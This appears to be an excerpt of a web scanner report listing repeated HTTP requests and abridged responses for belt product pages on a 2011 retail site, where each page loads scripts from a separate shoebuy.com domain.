GET /ed-hardy-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:09 GMT Server: Apache Set-Cookie: JSESSIONID=F4184CED858D9E4172AB013CB4440662; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>E ...[SNIP]... <meta name="description" content="Buy ed hardy belts with a price guarantee and top rated customer service. You can compare multiple ed hardy belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /ed-hardy-eh1206/301131 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:28 GMT Server: Apache Set-Cookie: JSESSIONID=A737041956F9B36DC87449DB7BE75FBC; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]... ent="Check out this fantastic design from Ed Hardy.This leather belt features a bold printed bulldog design as well as Ed Hardy logo. Metal rivets near the buckle give it even more of a rugged look."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /ed-hardy-eh1206/301131/643692 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:27 GMT Server: Apache Set-Cookie: JSESSIONID=DF926E64BBA85BFE414370CC46BB7EB3; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]... ent="Check out this fantastic design from Ed Hardy.This leather belt features a bold printed bulldog design as well as Ed Hardy logo. Metal rivets near the buckle give it even more of a rugged look."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /ed-hardy-eh1206/301131/643693 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:28 GMT Server: Apache Set-Cookie: JSESSIONID=E0E07D9662CAE55BEF428615CE83F4C8; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]... ent="Check out this fantastic design from Ed Hardy.This leather belt features a bold printed bulldog design as well as Ed Hardy logo. Metal rivets near the buckle give it even more of a rugged look."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /ed-hardy-eh1206/301131/643694 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:28 GMT Server: Apache Set-Cookie: JSESSIONID=DC7C92F514464D35493543D312D2487F; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]... ent="Check out this fantastic design from Ed Hardy.This leather belt features a bold printed bulldog design as well as Ed Hardy logo. Metal rivets near the buckle give it even more of a rugged look."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /green-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:28 GMT Server: Apache Set-Cookie: JSESSIONID=1F2215458ACD22B5FFCE6F03BC0F36ED; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>G ...[SNIP]... <meta name="description" content="Buy green belts with a price guarantee and top rated customer service. You can compare multiple green belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /hugo-boss-baxter-belt/195604 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=378BF103DD216EBA567C81A5BF37ED31; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <meta name="description" content="This stylish leather dress belt features a tapered end and a raised bar logo plaque buckle."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /hugo-boss-baxter-belt/195604/436031 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=3C0F6224C36A59AE3950A6AFC6615D9E; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <meta name="description" content="This stylish leather dress belt features a tapered end and a raised bar logo plaque buckle."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /hugo-boss-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:22 GMT Server: Apache Set-Cookie: JSESSIONID=6728BDE6431918BCF0739D0EFB6C9294; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>H ...[SNIP]... <meta name="description" content="Buy hugo boss belts with a price guarantee and top rated customer service. You can compare multiple hugo boss belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /hugo-boss-benson-belt/195607 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:24 GMT Server: Apache Set-Cookie: JSESSIONID=C85B6D7C67648A1E0EEF8B24CCF11DD9; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <meta name="description" content="This stylish leather dress belt features a tapered end and an open bar logo buckle."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /hugo-boss-benson-belt/195607/436036 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=FE1778B527989ECBC2AD3048A48CBEF6; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <meta name="description" content="This stylish leather dress belt features a tapered end and an open bar logo buckle."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /hugo-boss-bud-belt/195605 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=15E331CC2D3DFA9ADB8CCD6E294F9C69; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <meta name="description" content="The perfect belt for Jeans! Features smooth leather with a straight end and a roll bar buckle."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
HTTP/1.1 200 OK Date: Fri, 11 Feb 2011 14:30:40 GMT Server: Apache Set-Cookie: JSESSIONID=74BFACEF2ACEE6681A28415032237D27; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 30632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <meta name="description" content="The perfect belt for Jeans! Features smooth leather with a straight end and a roll bar buckle."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /hugo-boss-bud-belt/195605/436033 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=864F393E90E84A8D34E2F958096DD17A; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <meta name="description" content="The perfect belt for Jeans! Features smooth leather with a straight end and a roll bar buckle."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </div>
GET /india-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:56 GMT Server: Apache Set-Cookie: JSESSIONID=045B86F531B3AFB97C2013588BAB466D; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>I ...[SNIP]... <meta name="description" content="Buy india belts with a price guarantee and top rated customer service. You can compare multiple india belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /kurt-muller-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
